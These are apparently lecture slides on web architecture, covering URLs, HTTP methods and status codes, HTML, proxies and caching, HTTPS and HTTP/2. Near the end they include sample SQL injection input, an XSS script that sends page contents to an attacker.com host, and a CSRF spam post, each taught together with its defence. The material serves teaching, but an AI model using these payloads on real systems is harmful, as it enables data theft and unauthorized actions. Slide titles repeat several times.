Web Architecture & Technologies

The Web seems an “evident” extension
of the Internet.

What is so special about
the invention of the Web?

This flyer predates the Web’s boom.
What is missing?

[A flyer with instructions on how to obtain files through a mailserver and FTP server.]

The Web actually consists of
3 separate—but connected—inventions.

A URL uniquely identifies a resource.
- Uniform Resource Locator
HTTP allows us to retrieve a representation
of a resource through a URL.
- HyperText Transfer Protocol
An HTML document can represent a resource,
and link to other resources through their URL.
- HyperText Markup Language

A Web URL uniquely identifies and locates a resource anywhere in the universe.

A string is a unique identifier if
at most one entity corresponds to it.
- A national number uniquely identifies a person,
  but does not allow locating him or her.
A string is a unique locator if
at most one location corresponds to it.
- A street address uniquely identifies a location,
  but does not allow to identify a specific person.

A (well-chosen) URL combines
identification and location.

http://en.wikipedia.org/wiki/Susan_Wojcicki

This URL identifies the current Wikipedia article about Susan Wojcicki.
- It does not (also) identify Susan herself.
- Otherwise, it wouldn’t be unique anymore.
At the same time, this URL allows us to locate the Wikipedia article about Susan Wojcicki.
- Again, not Susan herself—nor anything else.

Deceptively simple, the URL is probably the most revolutionary part of the Web.

The flyer we saw earlier shows
what a lack of unique location means.
- publisher-specific download instructions
- machine-dependent execution
Unique identification partially existed,
but not yet globally for documents.
- e-mail address and server names are global
- document names are server-specific

The generic URL syntax
extends beyond the Web.

<scheme>:<scheme-specific-part>

different possible schemes
- ftp
- http
- mailto
- file
- …
different scheme-specific parts
- //<user>:<password>@<host>:<port>/<url-path>
specified by the Internet Engineering Task Force in Request For Comments 1738

The uniform structure of an HTTP URL
includes the following parts.

http://<host>/<path>?<search>#<fragment>

hostname: identifies the machine
path: identifies the resource within the machine
search: optionally refines the resource
fragment: optionally identifies a part of the resource

The uniform structure of an HTTP URL
includes the following parts.

http://en.wikipedia.org/wiki/Susan_Wojcicki#Career

hostname: the machine is en.wikipedia.org
path: the resource is /wiki/Susan_Wojcicki
search: not present
fragment: the part of the resource is Career

An HTTP URL provides the instructions
to obtain a representation of the resource.

http://<host>/<path>?<search>#<fragment>

The client looks up one of the host’s IP addresses.
- The client uses DNS for this.
The client requests /<path>?<search>.
- The server generates a response in a server-specific way.
The client finds #<fragment>.
- Fragments are defined by the representation format.

An HTTP URL provides the instructions
to obtain a representation of the resource.

http://en.wikipedia.org/wiki/Susan_Wojcicki#Career

The client looks up an IP address of en.wikipedia.org.
- One such address is 91.198.174.192.
The client requests /wiki/Susan_Wojcicki.
- The server generates the corresponding Wikipedia article.
The client finds #Career.
- This corresponds to a header in the HTML document.

The URL became part of a family
of technologies related to identification.

URL – Uniform Resource Locator (RFC1738)
- unique identification and location of resources
- mailto:ruben.verborgh@ugent.be
URN – Uniform Resource Name (RFC2141)
- location-independent resource identifier
- urn:isbn:1783303018
URI – Uniform Resource Identifier (RFC3986)
- union of URLs and URNs

The broadest family is IRI,
which supports non-ASCII characters.

Not all characters are allowed in a URI.
- Percent-encode non-ASCII chars.
  - é becomes %C3%A9
- Percent-encode chars with other meaning.
  - ? becomes %3F
IRI – Internationalized Resource Identifier (RFC3987)
- Non-ASCII chars don’t need to be encoded.
- Chars with other meaning still need encoding.
- http://🏹.to/🗽🕐

HTTP is a protocol to transfer representations from a server to a client.

HTTP standardizes how clients send a request
for a representation of a resource through its URL.
HTTP standardizes how servers reply with a response that can contain a representation.
The most widely used version is HTTP/2.
- with protocol details available at
  - RFC7230
  - RFC7231
  - RFC7232
  - RFC7233
  - RFC7234
  - RFC7235

After resolving the server’s IP address,
the client can send an HTTP request.

The request starts with a request line.
- indicates
The request can contain header fields.
- including
The request can optionally contain a body.
- if the method allows it

After resolving the server’s IP address,
the client can send an HTTP request.

To obtain http://en.wikipedia.org/wiki/Susan_Wojcicki, the client connects to 91.198.174.192 on TCP port 80, and sends this request:

GET /wiki/Susan_Wojcicki HTTP/1.1
Host: en.wikipedia.org
User-Agent: MyBrowser/1.0
Accept: text/html

HTTP has a limited number of methods.
The following 5 are widely known.

GET: transfer a representation
HEAD: transfer only status and headers
POST: perform a resource-specific operation
PUT: replace all representations
DELETE: remove all representations

An HTTP method is safe
if it is read-only.

The client does not request
a state change of the resource.
- The server can still change something,
  but the client is not “accountable”.
Safe methods include GET and HEAD.
- Automated clients cannot cause harm with these.
Servers not respecting this contract act dangerously.
- Example: make people like a paper you wrote

An HTTP method is idempotent
if repetitions don’t alter the outcome.

The client can execute an idempotent request
1 or more times; the result remains the same.
- If a request (maybe) failed, just try it again.
Idempotent methods include all safe methods,
as well as PUT and DELETE.
- Deleting something multiple times
  is the same as deleting it once.
Repeating other methods might be undesired.

Clients send the hostname,
so one server can host multiple websites.

Although the client resolves it to an IP address,
the hostname is still sent to the server.
There is no one-to-one mapping
between server IP addresses and domains.
- One website can be hosted by multiple servers.
  - Multiple DNS entries exist for a hostname.
- One server can host multiple websites.
  - The Host header tells the server which one to pick.

When a server receives a request,
it generates a response.

The response starts with a status line.
- indicates
The response can contain header fields.
- including
  - Content-Type
  - Content-Length
The response can optionally contain a body.
- depending on status code
- contains the actual document contents

When a server receives a request,
it generates a response.

In response to our previous request:

HTTP/1.1 200 OK
Date: Wed, 18 Feb 2016 09:30:46 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 24 Jan 2016 18:26:27 GMT

<!DOCTYPE html>
<html lang="en" dir="ltr" class="client-nojs">
…

HTTP has 5 categories of status codes
to indicate how the request was handled.

100–199: info – the client may continue
200–299: success – request understood & accepted
300–399: redirection – further action is needed
400–499: client error – the request cannot be fulfilled
500–599: server error – the server failed to fulfill

A couple of these status codes
are very commonly encountered.

200: OK (“default”)
301: Moved Permanently
404: Not Found
500: Internal Server Error

HTTP has 5 categories of status codes
to indicate how the request was handled.

HTTP status ranges in a nutshell: 1xx: hold on 2xx: here you go 3xx: go away 4xx: you fucked up 5xx: I fucked up
Steve Losh August 28, 2013

HTML is a markup language that
captures the structure of documents.

HTML divides a document into elements,
which are indicated by opening and closing tags.
- Tags begin with “<” and end with “>”.
- (Regular) closing tags begin with “</”.
- Self-closing tags end with “/>”.
Opening tags can have key/value attributes.
- The key name is followed by “=” and its value.
- The value is usually surrounded by (single/double) quotes.

An element consists of its tags, attributes, and child nodes (elements and/or text).

This is a fragment of an HTML document.

<main>
  <h1>This is a title.</h1>
  <p id="introduction" class="summary">
    This is a paragraph<br/>
    with <em>emphasized</em> words.
  </p>
  <img src="image.jpg" alt="an image" />
</main>

The HTML specification restricts
what elements can be used and where.

A few dozen tags exist for different element types.
They have rules for what attributes they can have, and what child elements they can/should have.
There are three main parts:
- <html> for the entire document
- <head> for document metadata
- <body> for document contents

HTML documents can contain hyperlinks
and other hypermedia controls.

The <a> tag starts a link toward another resource.
- <a href="https://perdu.com/">Lost?</a>
- results in the link “Lost?”
A <form> element creates requests from user input.
- Keywords
This results in a URL for a resource, whose representation can be retrieved through HTTP.

HTML documents can embed or use
other media documents.

Embed images, audio, and video.
- <img>
- <audio>
- <video>
Use style sheets, fonts, and scripts.
- <link rel="stylesheet">
- <script>
Embed other pages (instead of linking to them).
- <iframe>

HTML is intended for markup,
not for makeup.

HTML elements focus on structure…
- <h2>The <em>new</em> section</h2>
…not on aesthetics.
- <font size="5"> <b>The <i>new</i> section</b> </font><br/>
Makeup-only elements were removed from HTML5.

The Web supports an immense variety
of different clients.

interactive (graphical) browsers
- Firefox
- Chrome
- Edge
- Opera
- Qutebrowser
applications
- Web applications
- (native) desktop & mobile applications
crawlers
embedded devices and sensors
- Web of Things

All clients need to support
a couple of core technologies.

networking technologies
- TCP/IP
- DNS
the HTTP protocol
- many libraries exist
- often combined with networking support
one or more representation formats
- not necessarily (only) HTML

Browsers offer an interactive environment
for general-purpose website consumption.

They render HTML elements as interactive controls.
They typically support styles, media, and scripts.
Standards ensure consistency (mostly).
The main differences are features and preferences.
- operating system
- performance
- extensions

Web applications perform HTTP requests
using browser scripting functionality.

A script on a webpage can make HTTP requests.
The server typically returns JSON or XML responses,
which the script then transforms.
- Alternatively, the server could return HTML,
  for instance, to update parts of the page.
Scripts can be triggered automatically
or through user actions.
- clicking a button or link
- pressing a key (autocompletion)

Desktop and mobile applications
can similarly create HTTP requests.

They use their own infrastructure,
as they don’t have the browser’s.
- In particular, they usually don’t set cookies.
They typically request JSON (or XML),
but HTML is not uncommon.
- HTML can be used to render partial views.
- Is there a real need then for a native app?

Crawlers process and/or index webpages,
and follow links to others.

Crawlers extract, process, and index text contents.
They also analyze (some) structured annotations.
- to improve search results (Google’s Rich Snippets)
- for social interactions (Facebook’s Open Graph)
Using links, they discover other pages.
- Content behind forms etc. is called the deep Web.
- Crawlers are making progress in using forms.

The HTTP protocol does not attach
meaning to URL paths and query strings.

Even though you might attach meaning to a URL like
https://example.org/products/guitars.html?brand=gibson,
such an interpretation is not specified.

In particular, slashes do not necessarily indicate folders;
a dot does not necessarily signal an extension.

The server might just have used this URL instead:
https://example.org/products-guitars?html%2Fbrand.gibson
and it might very well point to an image.

Web servers exist in many kinds and
have many possible implementations.

file servers
- for static files
application servers
- for interactive sites
- for editable content (Content Management Systems)
proxies
- delegate requests to other Web servers

A static file server maps HTTP URLs
to internal file URLs.

A config file usually assigns a root folder per domain.
- https://example.org/images/products/guitar.jpg could map to /var/www/example.org/images/products/guitar.jpg
Folders map to possible index files.
- https://example.org/images/products/ could map to /var/www/example.org/images/products/index.html
Custom permissions and rules can be set.
- location for NGINX
- .htaccess for Apache

An application server uses server-side code
to generate pages on demand.

The request is parsed by an application framework,
which exposes the URL, method, and headers.
Implementors can react to specific URLs or patterns, typically generating responses using templates.
Many languages and frameworks exist.
- languages:
  - Java
  - PHP
  - JavaScript
  - Ruby
  - C#
  - …
- frameworks:
  - Spring MVC
  - Ruby on Rails
  - ASP.NET
  - …

Several intermediaries may exist
between a client and a server.

In contrast to many other protocols,
HTTP enables transparent intermediaries.

This is not as easy with other protocols.
For example, let’s assume Java RMI.

remoteObject.getMessage(234);
remoteObject.getMessage(234);
remoteObject.deleteMessage(234);

If a proxy server is inserted before the remote server,
may it cache the result of getMessage? If so, how long?

HTTP can be transparent because of
its standardized uniform interface.

Caching is possible with headers
such as Cache-Control and ETag.
- Cache-Control: max-age=3600
- ETag: UniqueHash456
The intermediary fetches the requested item
and keeps it in cache until it expires.
Repeated requests for the item
are served from cache.

The standardized method semantics
are crucial to make caching work.

Repeated GET requests can be cached,
because GET is safe.
- The client did not ask for changes,
  so the server should perform none.
- Since nothing changes, we can bypass the server.
If POST or PUT are used on a resource,
a subsequent GET must not be read from cache.
- POST or PUT are not safe and may change things.
- (Repeated identical PUT requests can be ignored though.)

Intermediaries can play different roles
in an HTTP interaction.

caching: to improve performance and availability
security: to handle authorization and authentication
routing: to redirect toward the right server
load balancing: to distribute load over servers
anonymizing: to bypass identification or logging

Depending on their position the network,
proxies are forward or reverse.

(forward) proxy
- in the network of the client
- typically used for caching
- possibly for security/anonymity purposes
reverse proxy
- in the network of the server
- typically used for caching
- also for routing, hiding/abstracting remote architecture

A device can listen on only one TCP port 80.
A reverse proxy lets it run many servers.

What if we need to serve static and dynamic files?
What if we want to combine application servers?
- Only one application can listen to a given TCP port.
Configure servers to run on internal ports
(such as 3000, 4000, 5000) instead of port 80.
Run a reverse proxy (NGINX, Apache, …) on port 80,
which dispatches requests to the other servers.
- Route requests based on Host header and/or path.

The proxy interfaces with app servers
through other, non-public TCP ports.

Caching can happen virtually anywhere—
and we don’t always know.

The notion of “client” and “server”
is relative to the interaction.

HTTP nodes send plaintext over TCP,
which means intermediaries can read it.

The privacy of your requests is not guaranteed.
The privacy of server responses is not guaranteed.
The integrity of server responses is not guaranteed.

The Web needs to be a safe
and trusted environment for all.

HTTP poses a major threat for sensitive applications.
- banking
- payment
- medical records
- webmail
- …
It’s hard to define what is sensitive.
- Can others see what Wikipedia articles you read?

HTTPS is a secure extension
of the HTTP protocol.

Simply use HTTP over TLS precisely
as you would use HTTP over TCP.
Transport Layer Security (TLS) is a cryptographic protocol for Internet communication.
- TLS succeeded Secure Sockets Layer (SSL).
- TLS is still frequently referred to as “SSL”.
TLS relies on asymmetric encryption.
- private and public keys

HTTPS can be applied in
different parts of the network.

Consider the common use case in which
an application server lives behind a reverse proxy.

Only the proxy could use HTTPS.
- Typically, server and proxy operate in a trusted network.
- Client–proxy communications are secured.
The server and the proxy could use HTTPS.
- These are two different encrypted communications.
- No proxy can sit “in between” an encrypted communication.

Setting up HTTPS involves requesting,
installing, and maintaining a certificate.

Request SSL certificate from a certificate authority.
- This certificate is valid for one or more hostnames.
- Let's Encrypt provides free certificates for all.
Configure your Web server with the certificate.
- private key stored safely
- public key shared with clients
When the certificate expires, request a new one.

HTTPS URLs are different,
so clients know what protocol to use.

HTTP URLs start with http:
HTTPS URLs start with https:
After HTTPS has been configured,
server admins typically set up redirects.
- Never break existing URLs!
The connection between two URLs differing only in http/https is not universally defined.
- They could be different things.

Informing users about security in the UI
is an important part of a safer Web.

Most browsers indicate HTTPS in the address bar.

[“Secure” indication in the address bar]

Several browser vendors campaigned
to have an all-HTTPS Web.

[current treatment of regular HTTP pages in Chrome]

[future treatment of regular HTTP pages in Chrome]

The Web has been pushing HTTP’s limits,
so an update was due.

The Web has different demands nowadays
than those initially envisaged.
HTTP/2 is an update of the HTTP protocol
that addresses a couple of key bottlenecks.

This section is based on http2 explained
by Daniel Stenberg, creator of curl.

Webpages consist of more and more items
that increasingly become larger.

The HTTP Archive saw median total page transfer sizes increase from 0.5MB in 2010 to 2MB in 2022.
The median page consist of 69 objects.

Several limitations of HTTP have
a negative impact on page load times.

TCP connections are not used optimally.
- Connections are costly due to the three-way handshake.
- Limit the connections per host to avoid exhaustion.
HTTP is very latency-sensitive.
Sequential handling of requests blocks pipelines.
- HTTP pipelining allows issuing multiple requests on a single TCP connection without waiting for responses to arrive.

Many websites use(d) workarounds
to circumvent HTTP’s limitations.

inlining: Embed scripts, images, and/or styles inside HTML documents instead of linking them to reduce the number of items.
concatenation: Combine several scripts, images, or styles into a single file.
sharding: Distribute resources across different domains to bypass connection restrictions.

HTTP/2 set out a couple of
important goals for improvement.

Reduce sensitivity to latency.
Eliminate the need for multiple connections.
Fix HTTP pipelining and line blocking.
Maintain interfaces, content, and URLs.
Be backward compatible for HTTP 1.1 clients.

HTTP/2 is a binary protocol that sends
frames over multiplexed streams.

Switching to binary makes framing easier.
- 10 types of frames
- HEADERS frame for HTTP headers
- DATA for request and response payloads
Multiplexing ensures objects don’t block each other.
- Frames from many streams flow over the same connection.
Additional compression reduces overhead.
- HTTP’s stateless nature implies repetition.

HTTP/2 always goes over TLS in practice,
even though the standard also allows TCP.

With regular TCP on port 80, clients would
need to upgrade from HTTP 1.x to HTTP/2.
- overhead necessary for backward compatibility
With TLS, Application-Layer Protocol Negotiation is embedded within the TLS handshake.
- no protocol selection latency
Firefox and Chrome will only support TLS.
- https: everywhere in the future

Protocol-level security is insufficient
to provide application-level security.

Protocol-level security only guarantees privacy and integrity from one endpoint to another.
The Web evolved from a document system to a distributed application platform.
Applications themselves also need
mechanisms to secure information.

We will examine 3 common attack types
and how to defend against them.

code injection: executing malicious scripts on the server
cross-site scripting: executing malicious scripts on the client
cross-origin access: accessing information from other websites

With code injection, clients send input
designed to execute on the server.

attack: executable code passed in a URL or POST body parameter
cause: improper input validation by the server
defense: never trust raw client input; validate input ranges; escape values before passing to scripts

SQL injection used to be
a very common type of attack.

Server-side code

query = "SELECT id FROM User WHERE name='" + name + "' +
        " AND password='" + password + "'";

Client-side code

username password

Result

SELECT id FROM User WHERE name='admin'
                    AND password='' OR ''='';

Client-side validation only offers usability;
servers always need to (re-)validate.

Client-side form

role

Ways to bypass

change the HTML at runtime
construct the HTTP request in another way

Client-side-only validation in the real world

With Cross-Site Scripting (XSS), a client-side script steals information from a webpage.

attack: trick another site into executing code in its own space, exposing or changing user data
causes: improper input validation; trusting third-party content; social engineering
defense: validate input; add token field on forms

Injecting JavaScript in pages
can steal a user’s personal data.

Original page echoes `assets` in contents

https://mybank.com/onlinebanking/?search=assets

Attack code

(xhr = new XMLHttpRequest()).open('GET',
  'https://attacker.com/?data=' + document.body.innerHTML);
xhr.send(null);

Modified URL echoes the attack code in contents

https://mybank.com/onlinebanking/?search=%3Cscript%3E(xhr%20%3D%20new

Submitting a form to another site
can execute actions on a user's behalf.

Attack code placed on third-party website

(xhr = new XMLHttpRequest()).open('POST',
  'https://reddit.com/?message=Cheap%20Pills%20For%20Sale');
xhr.send(null);

Cross-Site Request Forgery (CSRF) Prevention

<input name="csrf" type="hidden" value="XVduuls7" />
<input name="message" type="text"/>

With cross-origin access, a page requests third-party resources through JavaScript.

attack: request resources from another site with JavaScript and read their contents
causes: the existence of XMLHttpRequest; being logged in on another website
defense: browsers block cross-origin requests by default

Cross-origin requests are a problem
within browsers only.

Nothing happens when any other script or app
requests https://mybank.com/onlinebanking/.
- You are not logged in—there are no cookies.
When the browser requests that page,
the page might contain personal information.
- You might be logged in—browsers maintain cookies.
As a result, browsers block cross-origin requests.
- an origin more or less corresponds to a domain

Cross-Origin Resource Sharing (CORS) enables others to access your pages.

Activate CORS to enable Web APIs access from within other browser-based Web applications.
The browser adds an Origin header to requests.
- Origin: https://my.site
If the server allows requests from that origin,
it adds Access-Control-Allow-Origin.
- Access-Control-Allow-Origin: https://my.site

Users spend most of their time on other sites.

This means that users prefer your site to work the same way as all the other sites they already know.
Jakob Nielsen

The Web seems an “evident” extension of the Internet.

What is so special about the invention of the Web?

This flyer predates the Web’s boom. What is missing?

The Web actually consists of 3 separate—but connected—inventions.

The Web actually consists of 3 separate—but connected—inventions.

A Web URL uniquely identifies and locates a resource anywhere in the universe.

A (well-chosen) URL combines identification and location.

Deceptively simple, the URL is probably the most revolutionary part of the Web.

The generic URL syntax extends beyond the Web.

The uniform structure of an HTTP URL includes the following parts.

The uniform structure of an HTTP URL includes the following parts.

An HTTP URL provides the instructions to obtain a representation of the resource.

An HTTP URL provides the instructions to obtain a representation of the resource.

The URL became part of a family of technologies related to identification.

The broadest family is IRI, which supports non-ASCII characters.

HTTP is a protocol to transfer representations from a server to a client.

After resolving the server’s IP address, the client can send an HTTP request.

After resolving the server’s IP address, the client can send an HTTP request.

HTTP has a limited number of methods. The following 5 are widely known.

An HTTP method is safe if it is read-only.

An HTTP method is idempotent if repetitions don’t alter the outcome.

Clients send the hostname, so one server can host multiple websites.

When a server receives a request, it generates a response.

When a server receives a request, it generates a response.

HTTP has 5 categories of status codes to indicate how the request was handled.

A couple of these status codes are very commonly encountered.

HTTP has 5 categories of status codes to indicate how the request was handled.

HTML is a markup language that captures the structure of documents.

An element consists of its tags, attributes, and child nodes (elements and/or text).

The HTML specification restricts what elements can be used and where.

HTML documents can contain hyperlinks and other hypermedia controls.

HTML documents can embed or use other media documents.

HTML is intended for markup, not for makeup.

The Web supports an immense variety of different clients.

All clients need to support a couple of core technologies.

Browsers offer an interactive environment for general-purpose website consumption.

Web applications perform HTTP requests using browser scripting functionality.

Desktop and mobile applications can similarly create HTTP requests.

Crawlers process and/or index webpages, and follow links to others.

The HTTP protocol does not attach meaning to URL paths and query strings.

Web servers exist in many kinds and have many possible implementations.

A static file server maps HTTP URLs to internal file URLs.

An application server uses server-side code to generate pages on demand.

Several intermediaries may exist between a client and a server.

In contrast to many other protocols, HTTP enables transparent intermediaries.

HTTP can be transparent because of its standardized uniform interface.

The standardized method semantics are crucial to make caching work.

Intermediaries can play different roles in an HTTP interaction.

Depending on their position the network, proxies are forward or reverse.

A device can listen on only one TCP port 80. A reverse proxy lets it run many servers.

The proxy interfaces with app servers through other, non-public TCP ports.

Caching can happen virtually anywhere— and we don’t always know.

The notion of “client” and “server” is relative to the interaction.

HTTP nodes send plaintext over TCP, which means intermediaries can read it.

The Web needs to be a safe and trusted environment for all.

HTTPS is a secure extension of the HTTP protocol.

HTTPS can be applied in different parts of the network.

Setting up HTTPS involves requesting, installing, and maintaining a certificate.

HTTPS URLs are different, so clients know what protocol to use.

Informing users about security in the UI is an important part of a safer Web.

Several browser vendors campaigned to have an all-HTTPS Web.

The Web has been pushing HTTP’s limits, so an update was due.

Webpages consist of more and more items that increasingly become larger.

Several limitations of HTTP have a negative impact on page load times.

Many websites use(d) workarounds to circumvent HTTP’s limitations.

HTTP/2 set out a couple of important goals for improvement.

HTTP/2 is a binary protocol that sends frames over multiplexed streams.

HTTP/2 always goes over TLS in practice, even though the standard also allows TCP.

Protocol-level security is insufficient to provide application-level security.

We will examine 3 common attack types and how to defend against them.

With code injection, clients send input designed to execute on the server.

SQL injection used to be a very common type of attack.

Server-side code

Client-side code

Result

Client-side validation only offers usability; servers always need to (re-)validate.

Client-side form

Ways to bypass

With Cross-Site Scripting (XSS), a client-side script steals information from a webpage.

Injecting JavaScript in pages can steal a user’s personal data.

The Web seems an “evident” extension
of the Internet.

What is so special about
the invention of the Web?

This flyer predates the Web’s boom.
What is missing?

The Web actually consists of
3 separate—but connected—inventions.

The Web actually consists of
3 separate—but connected—inventions.

A (well-chosen) URL combines
identification and location.

The generic URL syntax
extends beyond the Web.

The uniform structure of an HTTP URL
includes the following parts.

The uniform structure of an HTTP URL
includes the following parts.

An HTTP URL provides the instructions
to obtain a representation of the resource.

An HTTP URL provides the instructions
to obtain a representation of the resource.

The URL became part of a family
of technologies related to identification.

The broadest family is IRI,
which supports non-ASCII characters.

After resolving the server’s IP address,
the client can send an HTTP request.

After resolving the server’s IP address,
the client can send an HTTP request.

HTTP has a limited number of methods.
The following 5 are widely known.

An HTTP method is safe
if it is read-only.

An HTTP method is idempotent
if repetitions don’t alter the outcome.

Clients send the hostname,
so one server can host multiple websites.

When a server receives a request,
it generates a response.

When a server receives a request,
it generates a response.

HTTP has 5 categories of status codes
to indicate how the request was handled.

A couple of these status codes
are very commonly encountered.

HTTP has 5 categories of status codes
to indicate how the request was handled.

HTML is a markup language that
captures the structure of documents.

The HTML specification restricts
what elements can be used and where.

HTML documents can contain hyperlinks
and other hypermedia controls.

HTML documents can embed or use
other media documents.

HTML is intended for markup,
not for makeup.

The Web supports an immense variety
of different clients.

All clients need to support
a couple of core technologies.

Browsers offer an interactive environment
for general-purpose website consumption.

Web applications perform HTTP requests
using browser scripting functionality.

Desktop and mobile applications
can similarly create HTTP requests.

Crawlers process and/or index webpages,
and follow links to others.

The HTTP protocol does not attach
meaning to URL paths and query strings.

Web servers exist in many kinds and
have many possible implementations.

A static file server maps HTTP URLs
to internal file URLs.

An application server uses server-side code
to generate pages on demand.

Several intermediaries may exist
between a client and a server.

In contrast to many other protocols,
HTTP enables transparent intermediaries.

HTTP can be transparent because of
its standardized uniform interface.

The standardized method semantics
are crucial to make caching work.

Intermediaries can play different roles
in an HTTP interaction.

Depending on their position the network,
proxies are forward or reverse.

A device can listen on only one TCP port 80.
A reverse proxy lets it run many servers.

The proxy interfaces with app servers
through other, non-public TCP ports.

Caching can happen virtually anywhere—
and we don’t always know.

The notion of “client” and “server”
is relative to the interaction.

HTTP nodes send plaintext over TCP,
which means intermediaries can read it.

The Web needs to be a safe
and trusted environment for all.

HTTPS is a secure extension
of the HTTP protocol.

HTTPS can be applied in
different parts of the network.

Setting up HTTPS involves requesting,
installing, and maintaining a certificate.

HTTPS URLs are different,
so clients know what protocol to use.

Informing users about security in the UI
is an important part of a safer Web.

Several browser vendors campaigned
to have an all-HTTPS Web.

The Web has been pushing HTTP’s limits,
so an update was due.

Webpages consist of more and more items
that increasingly become larger.

Several limitations of HTTP have
a negative impact on page load times.

Many websites use(d) workarounds
to circumvent HTTP’s limitations.

HTTP/2 set out a couple of
important goals for improvement.

HTTP/2 is a binary protocol that sends
frames over multiplexed streams.

HTTP/2 always goes over TLS in practice,
even though the standard also allows TCP.

Protocol-level security is insufficient
to provide application-level security.

We will examine 3 common attack types
and how to defend against them.

With code injection, clients send input
designed to execute on the server.

SQL injection used to be
a very common type of attack.

Client-side validation only offers usability;
servers always need to (re-)validate.

Injecting JavaScript in pages
can steal a user’s personal data.

Original page echoes `assets` in contents

Submitting a form to another site
can execute actions on a user's behalf.

Cross-origin requests are a problem
within browsers only.